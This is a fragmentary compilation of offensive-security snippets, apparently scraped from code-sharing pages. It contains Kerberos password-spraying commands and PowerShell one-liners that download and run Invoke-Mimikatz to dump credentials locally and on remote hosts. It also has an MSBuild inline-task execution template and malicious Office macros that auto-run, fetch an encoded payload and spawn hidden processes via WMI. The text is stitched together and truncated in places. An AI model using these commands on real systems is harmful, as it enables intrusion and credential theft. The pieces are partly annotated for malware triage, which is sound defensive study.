With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
| RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
| https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
| Recording of talk from CERN | |
| https://indico.cern.ch/event/622483/ (click the recording button) | |
| Past talks: | |
| http://www.slideshare.net/KenJohnson61/aws-surival-guide |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Invoke-Mimikatz | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] |
| function Compress-Data | |
| { | |
| <# | |
| .Synopsis | |
| Compresses data | |
| .Description | |
| Compresses data into a GZipStream | |
| .Link | |
| Expand-Data | |
| .Link |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Pass xml to msbuild for compile and execution --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild filepath\filename.xlm --> | |
| <!-- Configure AssemblyFile and pok for that to work --> | |
| <Target Name="34rfas"> | |
| <QWEridxnaPO /> | |
| </Target> | |
| <UsingTask | |
| TaskName="QWEridxnaPO" | |
| TaskFactory="CodeTaskFactory" |
| //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
| //posted by @JohnLaTwC | |
| // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
| ----------------------------------------------- macro ---------------------------------- | |
| ' Workbook_Open is the Excel event handler that runs automatically when the workbook is opened | |
| ' (once macros are enabled), so the two routines below execute without further user action. | |
| ' doom_Init and doom_ShowHideSheets are defined outside this excerpt; their behaviour is not shown here. | |
| Private Sub Workbook_Open() | |
| Call doom_Init | |
| Call doom_ShowHideSheets | |
| End Sub | |
| 'get OS, if nt else if OS X | |
| ' Binds the C library routine system() exported by libc.dylib so VBA code can pass it a command string. | |
| ' libc.dylib is the macOS C library, so this declaration only resolves on Office for Mac. | |
| ' NOTE(review): a Declare against libc "system" inside a document macro is a strong triage signal for | |
| ' OS command execution; the call sites are outside this excerpt. | |
| Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long | |
| ' A Base64 Encoder/Decoder. | |
| ' | |
| ' This module is used to encode and decode data in Base64 format as described in RFC 1521. | |
| ' | |
| ' Home page: www.source-code.biz. | |
| ' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html). | |
| ' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. |
| ' Loads the comma-delimited text file named by strFile into Sheet1 of the active workbook, starting at cell A1. | |
| ' strFile is concatenated unchanged into the "TEXT;" connection string. | |
| ' The function never assigns a return value. | |
| Function CSV_Import(strFile) | |
| Dim targetSheet As Worksheet | |
| Dim csvQuery As QueryTable | |
| Set targetSheet = ActiveWorkbook.Sheets("Sheet1") | |
| Set csvQuery = targetSheet.QueryTables.Add(Connection:="TEXT;" & strFile, Destination:=targetSheet.Range("A1")) | |
| csvQuery.TextFileParseType = xlDelimited | |
| csvQuery.TextFileCommaDelimiter = True | |
| ' Refresh performs the actual import into the sheet. | |
| csvQuery.Refresh | |
| ' Flag the workbook as saved so closing it does not raise a save-changes prompt. | |
| ActiveWorkbook.Saved = True | |
| End Function | |
| Sub DownloadAndExec() | |
| Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") | |
| Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") | |
| xHttp.Open "GET", "https://trusted.domain/encoded.crt", False | |
| xHttp.Send | |
| With bStrm | |
| .Type = 1 '//binary | |
| .Open |
| ' GotFocus event handler for the control named InkEdit1: when that control receives focus, Debugging is called. | |
| ' Debugging (defined directly below) opens the WMI root\cimv2 namespace and prepares a Win32_ProcessStartup | |
| ' instance; the remainder of its body is cut off in this excerpt. | |
| ' NOTE(review): the entry point is a control event rather than AutoOpen/Document_Open, so macro triage that | |
| ' only searches for the usual auto-run names would miss it. | |
| Sub InkEdit1_GotFocus() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| Const HIDDEN_WINDOW = 0 | |
| strComputer = "." | |
| Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
| Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
| Set objConfig = objStartup.SpawnInstance_ |